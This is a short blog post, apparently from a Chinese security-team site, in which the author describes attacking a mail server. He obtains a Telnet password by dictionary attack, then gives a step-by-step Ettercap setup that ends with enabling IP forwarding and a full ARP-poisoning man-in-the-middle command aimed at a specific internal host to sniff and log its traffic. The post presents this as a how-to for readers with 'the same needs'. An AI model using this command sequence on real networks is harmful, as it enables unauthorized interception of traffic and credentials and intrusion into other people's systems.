Originally I couldn't be bothered to learn ETTERCAP.
But in order to take over a mail server, I scanned its class C segment..
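So there was no way in like that.
However, one TELNET password was in my powerful dictionary..
I searched Baidu, and most of the results were installation guides and explanations of the principles..
Aren't those just translations of the help documentation...
I gritted my teeth and worked at it for a few days, and finally achieved the intended goal.
I'm sharing this in the hope that those with the same needs can avoid some detours.
1. Preparation
The following need to be installed: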
libnet-1.1.2.1.tar.gz
libpcap-1.2.1.tar.gz
ettercap-NG-0.7.3.tar.gz
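Here is a quick way to install them:
just hand the file name to Google,
then download it with wget on Linux.
The whole process is basically done within 10 minutes.
Then: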
tar zxvf libnet-1.1.2.1.tar.gz
cd libnet
./configure
make
make install
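The classic three steps.
Then go back to the command line
and type ettercap -help
to confirm it is installed properly [and take a quick look at the help while you're at it].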
locate etter.conf
This searches for the configuration file.
Once you have found where the configuration file is:
nano /usr/local/etc/etter.conf
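Find the following places and change them as shown (some of these are not required, but I like to do it this way... because it is convenient):
When you are done, press CTRL+X, then Y, and finally Enter once.
After the changes, go back to the command line and type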
sysctl -w net.ipv4.ip_forward=1
This makes the host forward packets it receives whose destination address is not the host itself.
The preparation is now done.
Type
ettercap -i eth0 -l /tmp/0304l -m /tmp/0304m -T -q -M ARP /192.168.2.3/ //
This listens on the eth0 interface, sniffs 192.168.2.3, saves the log info to 0304l, and saves the message file to 0304m.
The sniffing result looked like this..
Unfortunately, someone was running a dictionary attack at that moment...
Notice: This article is licensed under CC BY-NC-SA 3.0. When reposting, please credit the source: Panni Security Team. Link to this article: http://www.panni007.com/2013/03/13/794.html